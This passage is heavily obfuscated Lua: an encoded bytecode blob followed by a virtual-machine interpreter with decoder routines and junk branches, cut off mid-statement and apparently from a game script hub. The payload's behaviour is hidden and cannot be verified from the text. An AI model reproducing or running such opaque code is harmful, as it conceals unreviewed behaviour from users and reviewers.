1622s2kH21z21h2BV2d21d24826g29n21v217191J2A11N1H1N22e2fA1029h1f2Ms27223t2B72og2oi25j24V2KR21u217171a15132ol2LN2I62252142Fl2F32fK1S2nU10111B1U1227Y1L1n161d23A2I1102po1a1e21M214151R1T1L2sN191622v2B72rw2D02252f129G28D2i51q25N25b28s27926o25r2662rU29g21o1d1O1S1n21h2g52252my29Z1s1U2232tS2S62u62U82s12Gn2cG2ca1a1X2Mq2BJ1722221D2CW2381R1S2f52f724r25E2nL21z1y1h21C1x2PZ161B2Sl2S81727224E2J22Su1h2172171s1q2ca1521n21i1D2sZ1q2l22Rs2Ps2M32LU1C21i2191N26T23W2pA1021321W2uo1022E21R1r2JI1k1d21L2cm1N25s24N2ak22u1a27d1T25H2582Go21l1k21e2qJ2FM2FO2qm26T2pH2pC24u2hf1022621B28o26g2hm28J2rx2QR112162202L62p91d2Mk25425P2w91A21w2xl2792fJ161H2j526124w2KH2TP1L1028226h2P5102is2sk1Y21B1r111721J2171115182162Aj27921W1x162a21F2NW2DR2Tj2OL21T2142k522W2Hn141D2jE2Jg2eL26b2Fs27922U2z62Nt24827329N22p1K112v02bI102OI2tn2oZ2cN1t23M26E1g27l2WM21n2131u15112m82H42gb22Y2tL2Ae2Bb2AX1N21o2Xv2C21h2fv141R2602562Kr22r12122k721m2W529j2XO162rL2kh2FJ2M91621t2182cw2gg2C92T62d0162Yv1021t21e102FK23M2X527921Y192dJ2YO2Al21N2Hn1R1C23529n22X1q21821O310N2K71123p28h2j31j1f1a1b121e23C1R2yp1x13172qB1o2yI2d02132161A171H1821a2rx1l21D21F2lO2MS25T2Wp27922s2YG1n1I25h24M2B727M27O23w26N2nL2LI2vE111n1X2x12QL22F2kQ2at2171h132Dh1P2122181j1p1E1n24326H2Cw2v71a12182in1b23z26c2rH2AL21K1a281171d1e1J1M21G2U61L1I192t323h2aK2AM2ZK1625y24X2VK2JZ2VN2vp2vr2Vt2Vv2i62vy24831201021v2i9182iB122362sT22B21E1O21g2ix101I2Ys21j21j2KL2kN1723F1o2N72Ya1z11313c1J1D2vT1I21N2W51N21021H102f61b1n112iN2332k52212132eh141E2qi2Ca2bV1A2qZ27922E2hq1n2Th21s27225n2KH2lt2n72o01725o2AR2eD2132f62Fo21d2d92db25j24k2F22R11t3114311p2df1I312L1S28O1E1H1c23B2M22nM21J29J2BM2mk2822yD2yF315o1U2st2912Fd1M21321j2Pa2YF22n2362iT2du25L2gE1022021p1O1c2js2t61s316m2a82bq2PC1B1O25625d2kR2391R2T11T2lL2Pc21721k1I1s23S26K2Kr2282F12uU2mU310Y26g23v2f2220215312329v26g2za1028831402LL314023u26P2ZV2c2311W1D2G717315Q2kB2kB28122y2JL2nm2131r2rj310y1T22x2St2Jz2sw2A32sZ318x1V2T42T61q311821Y28M28O2432Be2rg29r26b319e27922P18142oN1R23F317Z2zb2OH2t51F2bm2cJ31692K02Th316l2R0311t21p312L2gl3106316N14112nh2Gd2cW2Jz2y6141c1u23g2R331AW2s81t1831ay2622WW2xW2J92Bx2q7311V2a322d2aD102R11Q26X2xF2a82aA2B32mI21T29m2ho21N2o81S21f21H29a22c21G319t318f318H318J1D21I21P2zN21028D1621M21T317p23b2tG2Im21m21o31B71P1i314c314E1S2qD2xw1I2Ib1C172fN1L2On2GC2n4318e2131V102T421c2sJ22p31072G32qg182eY2422l5312A2e81R1q21p311K2jz1J1425D24o2g2231310O1D1f1v1U2C61T1b314m2W131Bs1U25G31c310316D31001131602CJ2PC26X24c2St2352Km1g1g21m21C1121d313k2m52d21625425I2G22Is2OI316i2Cb1a311q27U1Y31651M102oA1b21S2h82Bo1631ap2712C12bG318Y2k03191319324L2V52aT2Av310a313e315M2K72IO2OQ31F221331dr31DT2172212Kh31EH310o1o26Z31CG316o2PC2TH21t21O2Sl2JM310F191423m2be22U314b1V1m24326Q2B722B21i141l21m22N2St2Li317s313z2811121J31A61T28E1223o313w27E2131q1Y31771G24P26231G0310e2l81h21m2Q531c62jc2ZD2el2482NC2792V71h31032H523O2W02b82171f2tK1122z142c131IP2yi2yK182C91B22231112p62S21h1t1S1027223y2a72hp1o2rt29n22F2vU1721K1Z2Y52Xj31D831jb16314E1q31412gk2yX1931Aq2AK22t2N72l224331iu21v2181t1N1Y2g526C31Cg2kJ2kL1s2oi27v2F231kB13131t21T23H31gv2U52u72U91121p31kV2Al2131H2y51l28322w319T2is151O2s22F71y31iw31Iy26h23q2Go2Gq1D21O2ul2U925s24l2KH22321a2g62182MI1T31EW2KS2111D21721922Z1629N312Y31G72T21p2iU3179319f27O31Kx23P26l279315U28s1B2As310N2Tz27931Dn2ak1F1e315u2eY27918313z1I22y23C2791f2pG1i23A22s31N32BT1i23V24931N32sl1i23Z24D31N32tl1I22q23431N32R31I24223k31n32r21I21r21931N331M61i25924v31n32Bm1I22921V31N331J11i23k24231N32rE1I25524R31n32A21I22s23a31n3111E1i22322H31n32A41I24w24i31N31V1g315z21531n3317Z1i23h23331N31T1I1i24b23t31N31S2C524C23y31n31r1k1I24R25531N31Q314I24m25031N31P1M1I22A21s31n3315q31Nv31nX2a41N1O1I24023M31n32e11i25A24S31n31L1Q1i24623O31n31K1R1i1431IC1f2P22C629n1f1I31P915315R1F1H31eS1T317P1f1G1V1I21821q31n321b1W1i25824U31N321A1x1I24O25631n32191Y1I25124n31n321828921l21731n32172101I24F23x31N32162111i24G24y31n32152121i22z23D31N32142131i25T25f31N32132141i1K2f21F2122151I21e1w31N32112161i24u25831n32102171I22222g31N31Z2181I23C22y31n31Y2191i1E31Jf2a41x21A1I22e21w31n31w21b1I22x23F31n32Gs1i181Q31n321Q21d1I22522n31N321p21e1I22r23531n32en31pA28S1F21n21g1121h31ul31692A11I21v22931n331N523622O31N9141i23L24331NE151I25W25i31nj161i23I23031no171I23722P31nt181i23822U31Ny191I24423Q31o31A1I2152hB2A431O924p25731OD1C1i21921R31oI1d1i21a21o31ON31oP172y52A431Ou1a2ec2A431OZ1i24N25131p31h1i21x22f31P831pA23E22W31Pe2C522B21t31Pj31pL22t23B31pp314i22722l31pu31PW24E23w31q0313022g22231n331Q51i24123N31qA31DG26225K31qf31QH21Y22C31qL31qN25z25h31n331QS21Z22D31n331qW1i24t2Ty2A431R131932Nl31R531r726325L31rB31rD22D21z31RH31RJ21W22e31rN31rP26625o31RT28923b22t31RY31S01Z21D31S431s621721l31Sa31sC25u25c31sg31sI22L22731sm31SO21221G31n331ST1I24D23Z31sY31t021331642a431T51i23S24A31TA31tC21I21031tG31TI1b1p31N331Tn1I23Q24431tS31Tu22k22631TY21c31pX31PZ2a431u41I22821u31u931UB25324l31uF21f1i26025m31n331uk31uM21G310n2c4121I21C31fY2A431N525B24T31Uy1I24Y24G31v31i21d1z31V81i24Z24H31VD1i31bt31vi1I25s25e31Vn1I22N22531vs1i22m22431O82ag21h21331w11i21U22831w61I21T22b31wB1I23223g31ot31qV23323h31Oy31p01w311B2A431P421621k31WT1i25v25d31WX1I22422M31x11I23J23131X51I23u24831X91I21421m31xD1i24323L31Xh31q621g21231xM1i22U23831xQ1i1L2kH1F31Qm1i25428R2A431QS23r24531y231P922022i31N331y821121j31N331R61I23f22X31YF1i25024M31YJ1i24L25331yN1i24823u31yr1I26125n31Yv1I24X24J31yZ1I22I22031Z31i21f1x31z71I25724P31Zb1I23o24631zf31Su313L31zK1i24K25231T431t623922V31ZT1I24J24X31zx1i1p2C11F320224S25a32061i31Jz320A1i25y25g31u331u51m2B72ck31Ub24h24z320N1i24723p320s31Ul31UN31kQ320X1i22w23E31UU131I1J2W91f31NA1V2KR312331V424I24W321E23m240321i22J221321l25224K321P23123J321T22H223321X314J31292A431oE24Q254322524523R3229161k322d1i22622K322h1i24923V31wo1i1G2r92a431p91I2Te322T1x21F322x112vK2s8314I1D31Dy2a431PV31U031u22a431q123W24e323d1I23G232323H1y21c323l21B31D22A4323q23N24131xY1s1i23023I323y1I25x25j324231Es22V239324631r71U2K51f31RC1I22p237324F21k216324j21P21b324N1o2g21f31RZ2rH31461f31s51I21q218324z23T24b32532qS325724v259325B1I23d22Z325E1F1T325i1i22F21X325m25624O325q22c21y320131tO23x24f325y23P247326121021i32651I2dl320j1I23y24C326d22O236326h320U1414326l21J211326P2MJ131515320X31MK2791u1t326Q21S22a31UY2Pa2W91k1H31V432c131V823N22T26E2791g2kl25z25z31MQ31Wv31mq31Jz1x2151823S23S1m1U1832Br2791K1t31VO21o21A321t31WR31Mq325S1I31wZ31mq329L1x219317n2p01q31w232C92a42a211133285191731mU31Mt279172Px32Dj121c1c1p1l2P92w92sY31241i22122J31W12sZ1A32dV316G1A32e72791s1K1823n22C32ci101Q1u1426f26f32Cj31WW315h32672Us1422Q22q31pW31Bl122a732c631V423522R31v82Yg2F21S1O31Bl32E031KQ2sy32e031MO28s32bl31mJ32e031mm32fe28S1d32Dz32E02EH315U32fc2A728S"),(#M-(90));local function i(e,n,...)if(e==597147249)then return(a(a((n)-455627,971255),818723));elseif(e==317614219)then return((a(((n)-471454)-782470,670058))-452448);elseif(e==584451091)then return(a((a(n,678804))-490737,50476));elseif(e==110747827)then return(a(a(a((a(n,318745))-215848,216809),285662),239797));elseif(e==336800269)then return(((a((n)-416723,173158))-624050)-178789);elseif(e==935939086)then return(a(a(a(a(n,719470),929320),633378),100312));elseif(e==870287180)then return((a(a(n,475634),966840))-803314);elseif(e==785638448)then return((a((a((n)-942214,279810))-479603,770445))-978491);elseif(e==503551666)then return(a(a(a(a((n)-550049,53434),478339),63452),342102));elseif(e==525622344)then return(a((((n)-156673)-343590)-772930,674390));elseif(e==635896879)then return(a(a((a(n,208231))-97405,938096),293762));elseif(e==975099149)then return(a(a(((a(n,871504))-617619)-111710,709315),755733));end;end;local function n(e,n,...)if(e==7665422)then return(((((a(n,882364))-802969)-505669)-385680)-67264);elseif(e==976686199)then return(a((((n)-299947)-403374)-779005,990008));elseif(e==206496118)then return((((((n)-230966)-493136)-639951)-528814)-379516);elseif(e==651702610)then return(a((a(((n)-38743)-4614,367779))-830176,192948));elseif(e==441517234)then return(((a(n,884873))-44996)-613401);elseif(e==217616212)then return((a((a(n,814203))-54703,897963))-819237);elseif(e==933638057)then return((a(a(a(n,644315),207286),956660))-969478);elseif(e==671075528)then return(a((((n)-279861)-593030)-833614,708209));elseif(e==67639715)then return(a(a(a(n,176858),331469),370676));elseif(e==297975201)then return(a(((n)-577530)-771977,218378));else end;end;if _ENV then _ENV._ENV=_ENV end;local p=d[(35997585)];local C=d[(233890035)];local r=d[(231403878)];local c=d[((#{(function(...)return 111,891,870,...;end)(861,369,174)}+161358326))];local n=d[((#{}+434664729))];local s=d[(360567602)];local l=d.S8U2zw;local y=d[(621048503)];local F=d[(788685779)];local function t()local t,d,o,l=m(E,x,x+c);t=a(t,e);e=t%n;d=a(d,e);e=d%n;o=a(o,e);e=o%n;l=a(l,e);e=l%n;x=x+r;return((l*s)+(o*C)+(d*n)+t);end;local function s(x,e,n)if(n)then local e=(x/y^(e-l))%y^((n-l)-(e-l)+l);return(e-(e%l));else local e=y^(e-l);return(((x%(e+e)>=e)and(l))or(F));end;end;local function r()local o=a(m(E,x,x),e);e=o%n;x=(x+l);return(o);end;local function c()local o,l=m(E,x,x+y);o=a(o,e);e=o%n;l=a(l,e);e=l%n;x=x+y;return((l*n)+o);end;local J=""..d[p];local function n(...)return({...}),L(J,...);end;local function O(...)local p=d[(329162739)];local L=d[(137536645)];local M=d[(37277982)];local j=d[(28686599)];local g=d[(434664729)];local G=d[((#{243;799;485;(function(...)return 171;end)()}+444816127))];local V=d[(446349649)];local q=d["pUHAhnzN"];local F=d[((#{565;133;(function(...)return 684,767,54,633,...;end)(711,536,302)}+303638460))];local C=d[(178612124)];local O=d[(90578850)];local n=d['S8U2zw'];local b=d[(175538043)];local U=d['c0Jv34'];local D=d[((231403896-#("buy strawberry hub")))];local f=d[(73956846)];local w=d[((161358339-#("ok well")))];local N=d[((#{822;(function(...)return 763,798,794,...;end)()}+203133931))];local v=d[(793444818)];local T=d[((#{458;525;531;(function(...)return...;end)(83,121)}+828536146))];local y=d[((#{}+621048503))];local l=d[((788685782-#("bro")))];local function k(...)local d=({});local J=({});local i=({});local _=o(r,e);local H=c(e);for c=l,o(t,e)-n,n do local i=o(r,e);if(i%f==M)then local e=o(r,e);d[c]=(e~=l);elseif(h(i%f,y))then while(true)do local o=t(e);local x=t(e);local a=n;local o=(s(x,n,G)*(ce(y,b)))+o;local e=s(x,f,T);local x=((-n)^s(x,b));if(e==l)then if(h(o,l))then d[c]=B(z(x,l));break;else e=n;a=l;end;elseif(e==q)then d[c]=(o==l)and(z(x,(P(n,l))))or(x*(P(l,l)));break;end;local e=ee(x,S(e,U))*(a+(o/(y^N)));d[c]=e%n==l and B(e)or e break;end;elseif(i%f==v)then while(true)do local t=t(e);if(t==l)then d[c]=('');break;end;if(te(t,O))then local l,o=(''),(u(E,x,x+t-n));x=x+t;for n=n,#o,n do local n=a(m(u(o,n,n)),e);e=ie(n,g);l=l..A[n];end;d[c]=l;else local n,l=(''),({m(E,x,I(x,t)-n)});x=I(x,t);for x,l in o(oe,l)do local l=o(a,l,e);e=l%g;n=ae(n,A[l]);end;d[c]=n;end;break;end;elseif(i%f==F)then while(true)do local e=t(e);d[c]=u(E,x,S(x+e,n));x=x+e;break;end;else d[c]=nil end;end;local x=t(e);for e=l,x-n,n do i[e]=({});end;for g=l,x-n,n do local x=r(e);if(x~=l)then x=S(x,n);local m,A,a,E,f,u=l,l,l,l,l,l;local b=s(x,n,w);if(b==l)then a=(o(c,e));u=(o(c,e));E=(r(e));f=(o(c,e));elseif(h(b,w))then a=i[(t(e))];u=(c(e));E=(o(r,e));f=(o(c,e));elseif(h(b,p))then elseif(b==C)then a=(o(t,e));u=(c(e));E=(r(e));f=(c(e));A=({});for x=n,u,n do A[x]=({[l]=r(e),[n]=c(e)});end;elseif(b==y)then a=i[(t(e))];E=(r(e));f=(c(e));elseif(h(b,n))then a=(o(t,e));E=(r(e));f=(o(c,e));end;if(h(o(s,x,C,C),n))then a=d[a];end;if(h(s(x,j,j),n))then m=i[o(t,e)];else m=i[g+n];end;if(s(x,p,p)==n)then u=d[u];end;if(s(x,D,D)==n)then f=d[f];end;if(h(o(s,x,F,F),n))then A=({});for e=n,r(),n do A[e]=t();end;end;local e=i[g];e['BHG']=E;e['QtLqk93w']=u;e["HdmSGfoe"]=a;e[L]=A;e['JPfS']=f;e['nu6']=m;end;end;for e=l,t(e)-n,n do J[e]=k();end;return({["olAprS"]=d;[-V]=J;['EmW']=i;['THt']=l;[152120.02941267798]=H;["j9XG"]=_;});end;return(k(...));end;local function m(e,n,h,...)local n=e['olAprS'];local s=e[152120.02941267798];local F=e[-446287];local t=e['j9XG'];local e=e["EmW"];local n=0;return(function(...)local E=(L(J,...)-1);local y={...};local u=-(1);local c=e[n];local e=({});local A={};local l='HdmSGfoe';local x="JPfS";local e=(340612712);local e=(true);local o='nu6';local C='BHG';local e=805031;local n={};local r='QtLqk93w';local e=1;for e=0,E,e do if(e>=t)then A[e-t]=y[e+1];else n[e]=y[e+1];end;end;local E=E-t+1;repeat local e=c;local t=e[C];c=e[o];if(t<=i(975099149,79769))then if(t<=i(110747827,841141))then if(t<=i(a(265124790,298773764),a(945829590,d[668912994])))then if(t<=0)then n[e[x]]=m(F[e[l]],(nil),h);elseif(t==((f[549272126])or(d["NSTape1enI"](a(32042901,32818616),a,f,549272126))))then local e=e[x];n[e]=n[e](n[e+1]);for e=e+1,s do n[e]=nil;end;elseif(t<=((f[50023163])or(d[502086735](a(9757522,9254664),a,f,50023163))))then local t;local c;local u;local h;local r;local f;local a=0;local i=0;local function d(e,n,l)e=(a+e)%3 a=((e~=0)and a+((1==e)and-n or n)or a*n)%l return a end for o=2,32 do if d(8826,1636+o,3372)>1686 then if d(5144,9139+o,3124)>1562 then if d(5937,9061+o,478)<239 then else r=h[t[c]];end else if d(8371,1251+o,420)>210 then else if i~=1 then n[f]=r;i=1;end;end end else if d(1886,5428+o,1842)<921 then if d(1859,8374+o,3500)>=1750 then c=l;else h=n;end u=x;else if d(4966,8075+o,3962)<1981 then t=e;else f=t[u];end end end end n[e[x]]=e[l];e=e[o];local x=e[x];n[x](b(n,x+1,e[l]));for e=x+1,s do n[e]=nil;end;e=e[o];e=e[o];end;elseif(t<=((f[740447047])or((function(e)f[740447047]=a((a(a((e)-674534,27371),804229))-101891,634934);return(f[740447047]);end)(a(94965737,d[520964251])))))then if(t>a(83652762,d[8995844]))then local o=e[l];local l=n[o];for e=o+1,e[r]do l=l..n[e];end;n[e[x]]=l;elseif(t<((f[486886285])or((function(e)f[486886285]=(((((e)-304682)-307984)-679836)-254284)-128421;return(f[486886285]);end)(a(883519120,d[129152759])))))then do return;end;end;elseif(t>i(a(258931461,d["LJjSE"]),79764))then n[e[x]]=g(e[l]);e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];local f;local t;local i;local a=0;local function d(e,n,l)e=(a+e)%3 a=((e~=0)and a+((e<2)and-n or n)or a*n)%l return a end for o=2,31 do if d(9503,4065+o,782)<391 then if d(2287,6111+o,3226)>1613 then if d(8876,6449+o,2052)>1026 then else f=x;end t=e[l];else if d(9445,2113+o,492)<=246 then else end end else if d(6904,6231+o,2632)<=1316 then if d(2261,4904+o,2106)>1053 then n[e[x]]=#n[e[l]];else c=e[l];end n[e[x]]=n[e[l]];else if d(5698,3221+o,1940)<970 then else i=e[f];end n[i]=t;end end end n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];local f;local t;local i;local a=0;local function d(e,n,l)e=(a+e)%3 a=((e~=0)and a+((e<2)and n or-n)or a*n)%l return a end for o=0,31 do if d(5485,9567+o,1982)>=991 then if d(8034,4264+o,860)<=430 then if d(5324,6778+o,1142)>=571 then else end else if d(7079,2853+o,2984)>1492 then if(n[e[x]]==e[r])then c=c+1;else c=e[l];end;else f=x;end t=e[l];end else if d(9292,4871+o,2996)>=1498 then if d(5836,8846+o,976)<=488 then i=e[f];else n[i]=t;end else if d(7770,5781+o,2122)>=1061 then n[e[x]]=n[e[l]]+e[r];else end end end end n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];local f;local c;local t;local a=0;local function d(e,n,l)e=(a+e)%3 a=((e~=0)and a+((e<2)and-n or n)or a*n)%l return a end for o=0,33 do if d(8275,2978+o,1424)>712 then if d(5710,7763+o,1292)<646 then if d(5993,2593+o,2942)<1471 then f=x;else n[t]=c;end else c=e[l];if d(6280,1629+o,3536)>=1768 then t=e[f];else end end else if d(4913,7834+o,958)>=479 then if d(7007,9869+o,952)>476 then else end else if d(7468,7634+o,1286)>=643 then else end end end end n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];e=e[o];elseif(t<i(a(932325605,309669066),558358))then e=e[o];local l=e[x];u=l+E-1;for e=0,E do n[l+e]=A[e];end;for e=u+1,s do n[e]=nil;end;e=e[o];local l=e[x];do return b(n,l,u);end;e=e[o];e=e[o];end;elseif(t<=((f[17732026])or(d['NAPZY'](a(524677742,525226471),a,f,17732026))))then if(t<=i(110747827,841131))then if(t>((f[276549404])or((function(e)f[276549404]=(a(a(a(e,628918),480731),28948))-654081;return(f[276549404]);end)(a(22729726,d[314288847])))))then n[e[x]]=g(e[l]);elseif(t<i(935939086,850356))then local x=e[x];n[x]=n[x](b(n,x+1,e[l]));for e=x+1,s do n[e]=nil;end;end;elseif(t>a(95966113,d[520964251]))then n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];local i;local f;local t;local a=0;local function d(e,n,l)e=(a+e)%3 a=((e~=0)and a+((e<2)and n or-n)or a*n)%l return a end for o=0,34 do if d(2598,1245+o,1532)>=766 then if d(6453,9736+o,2080)<1040 then if d(9565,5683+o,2872)>=1436 then else end else if d(8070,5114+o,518)<=259 then else end end else if d(7031,6793+o,802)>=401 then i=x;if d(7083,7173+o,3820)<=1910 then f=e[l];else end else n[t]=f;if d(8963,4401+o,1184)<592 then else end end t=e[i];end end local f;local t;local i;local a=0;local function d(e,n,l)e=(a+e)%3 a=((e~=0)and a+((e<2)and-n or n)or a*n)%l return a end for o=0,34 do if d(2017,8154+o,3248)<=1624 then if d(7957,1085+o,2550)<1275 then if d(7294,1373+o,666)<=333 then else f=x;end else if d(5313,5054+o,2440)>1220 then else end end else if d(6482,5318+o,2584)<1292 then if d(7913,2549+o,2976)<=1488 then n[i]=t;else end else t=e[l];if d(2887,7199+o,1962)>=981 then i=e[f];else end end end end n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];local f;local i;local t;local a=0;local function d(n,e,l)e=(a+e)%3 a=((e~=0)and a+((e<2)and-n or n)or a*n)%l return a end for o=1,28 do if d(3879,6503+o,2882)>1441 then i=e[l];if d(1493,6175+o,726)<=363 then t=e[f];if d(3241,7080+o,2182)>1091 then n[t]=i;else end else if d(8122,2953+o,3058)<=1529 then else end end else if d(7037,1138+o,3694)>1847 then if d(5053,2238+o,784)>392 then f=x;else local o=e[l];local l=n[o];for e=o+1,e[r]do l=l..n[e];end;n[e[x]]=l;end else if d(2457,6481+o,3438)<=1719 then n[e[x]]=n[e[l]]+e[r];else end end end end n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];local t;local i;local f;local a=0;local function d(e,n,l)e=(a+e)%3 a=((e~=0)and a+((e<2)and n or-n)or a*n)%l return a end for o=1,30 do if d(5111,3170+o,400)>200 then if d(7658,3341+o,248)<124 then if d(5543,6667+o,1914)<957 then n[e[x]]=h[e[l]];else end else if d(3179,1345+o,548)>=274 then else c=e[l];end end else if d(3291,8199+o,3482)<1741 then if d(8964,9049+o,2226)>=1113 then n[f]=i;else n[e[x]]=#n[e[l]];end else t=x;if d(1307,2801+o,2522)<1261 then else i=e[l];end end f=e[t];end end n[e[x]]=e[l];e=e[o];local t;local c;local f;local a=0;local function d(e,n,l)e=(a+e)%3 a=((e~=0)and a+((1==e)and-n or n)or a*n)%l return a end for o=0,29 do if d(9215,2948+o,1216)<608 then t=x;if d(6231,8801+o,2350)>=1175 then if d(8320,1367+o,2832)>=1416 then else end else if d(7350,6395+o,2450)>1225 then c=e[l];else end f=e[t];end else if d(3606,1805+o,1424)<712 then if d(4701,9041+o,1186)<593 then else n[f]=c;end else if d(7933,1412+o,1698)>849 then else end end end end n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];e=e[o];elseif(t<((f[696011546])or(d[552536900](a(854375167,d[531620375]),a,f,696011546))))then n[e[x]]=#n[e[l]];end;elseif(t<=i(a(934008797,d[133164721]),1947587))then if(t>i(785638448,1516738))then local t;local c;local f;local a=0;local function d(e,n,l)e=(a+e)%3 a=((e~=0)and a+((1==e)and-n or n)or a*n)%l return a end for o=0,33 do if d(3077,5684+o,540)>=270 then if d(2659,4236+o,840)<=420 then if d(4506,4282+o,994)<497 then t=x;else end else if d(7619,7677+o,1926)<963 then else n[e[x]]=h[e[l]];end end c=e[l];else if d(1158,2732+o,1718)<859 then if d(5771,6385+o,706)>=353 then else f=e[t];end else if d(8460,2630+o,3520)>=1760 then n[f]=c;else end end end end n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];local t;local c;local f;local a=0;local function d(e,n,l)e=(a+e)%3 a=((e~=0)and a+((1==e)and n or-n)or a*n)%l return a end for o=0,29 do if d(5380,1193+o,2680)<=1340 then if d(7890,7627+o,3162)<=1581 then if d(1500,9275+o,1718)<=859 then n[e[x]]=n[e[l]];else f=e[t];end else t=x;if d(9406,1620+o,2434)>1217 then c=e[l];else end end else if d(9590,7165+o,972)<=486 then if d(1932,1349+o,610)>=305 then n[f]=c;else end else if d(3586,4006+o,3440)>=1720 then n[e[x]]=#n[e[l]];else end end end end n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];local t;local c;local f;local a=0;local function d(n,e,l)e=(a+e)%3 a=((e~=0)and a+((e<2)and n or-n)or a*n)%l return a end for o=0,33 do if d(1150,9985+o,2468)<1234 then if d(9427,7895+o,328)<164 then if d(4372,9649+o,2188)<=1094 then else end else if d(9209,2454+o,3244)<1622 then n[f]=c;else t=x;end c=e[l];end else if d(3622,3100+o,708)>354 then if d(3387,4719+o,212)>106 then else end else if d(9540,4973+o,3444)<1722 then f=e[t];else end end end end n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];local f;local c;local t;local a=0;local function d(n,e,l)e=(a+e)%3 a=((e~=0)and a+((e<2)and n or-n)or a*n)%l return a end for o=1,25 do if d(3608,3351+o,906)>453 then if d(2637,1421+o,244)<122 then if d(3621,1174+o,2138)>=1069 then t=e[f];else end else f=x;if d(9317,2715+o,1750)<=875 then n[t]=c;else c=e[l];end end else if d(2363,2408+o,782)<391 then if d(3054,7300+o,2038)<1019 then n[e[x]]=e[l]-e[r];else end else if d(7700,8562+o,2452)>1226 then n[e[x]]=h[e[l]];else end end end end n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];e=e[o];elseif(t<i(a(372582839,570189241),a(855044061,d[531620375])))then end;elseif(t>i(317614219,2097195))then n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];local i;local f;local t;local a=0;local function d(e,n,l)e=(a+e)%3 a=((e~=0)and a+((1==e)and n or-n)or a*n)%l return a end for o=1,31 do if d(8956,7507+o,2682)>1341 then if d(8561,5169+o,3060)>=1530 then if d(4546,4306+o,958)>479 then else end else i=x;if d(9532,4614+o,866)<=433 then else f=e[l];end end else if d(5696,4338+o,3420)<=1710 then if d(6395,9199+o,614)>=307 then t=e[i];else n[t]=f;end else if d(7239,4516+o,3504)>1752 then else end end end end n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];local t;local i;local f;local a=0;local function d(e,n,l)e=(a+e)%3 a=((e~=0)and a+((e<2)and-n or n)or a*n)%l return a end for o=0,29 do if d(4423,6062+o,3818)>1909 then if d(1930,8650+o,1102)>=551 then if d(2353,6397+o,1720)<860 then else n[f]=i;end else if d(7526,5076+o,3798)<1899 then else end end else t=x;if d(1826,9814+o,2164)>1082 then if d(2319,1633+o,344)<=172 then else end else if d(5408,5165+o,1366)<=683 then else i=e[l];end f=e[t];end end end n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];n[e[x]]=e[l];e=e[o];local f;local t;local i;local a=0;local function d(e,n,l)e=(a+e)%3 a=((e~=0)and a+((e<2)and n or-n)or a*n)%l return a end for o=0,30 do if d(8593,2675+o,2552)<=1276 then f=x;if d(7806,8074+o,572)>=286 then if d(8730,2911+o,2898)>1449 then else i=e[f];end else if d(7657,6467+o,1536)>=768 then n[i]=t;else t=e[l];end end else if d(1557,7645+o,1152)<576 then if d(6767,9592+o,3544)>1772 then else end else if d(8231,6642+o,658)>=329 then else end end end end n[e[x]]=e[l];e=e[o];local f;local i;local t;local a=0;local function d(e,n,l)e=(a+e)%3 a=((e~=0)and a+((e<2)and n or-n)or a*n)%l return a end for o=2,26 do if d(5033,6404+o,3256)<1628 then if d(5083,5892+o,2990)>=1495 then if d(2682,7019+o,2774)>=1387 then c=e[l];else end else if d(8669,5666+o,1756)>878 then f=x;else end end i=e[l];else t=e[f];if d(7681,4207+o,3914)>=1957 then if d(5382,6210+o,856)>=428 then else end else if d(4310,8675+o,2176)>1088 then n[t]=i;else end end end end n[e[x]]=e[l];e=e[o];e=e[o];elseif(t<((f[194183653])or((function(e)f[194183653]=(a((a((e)-229678,923413))-579092,113351))-851127;return(f[194183653]);end)(a(809478545,d[655990340])))))then local l=e[x];u=l+E-1;for e=0,E do n[l+e]=A[e];end;for e=u+1,s do 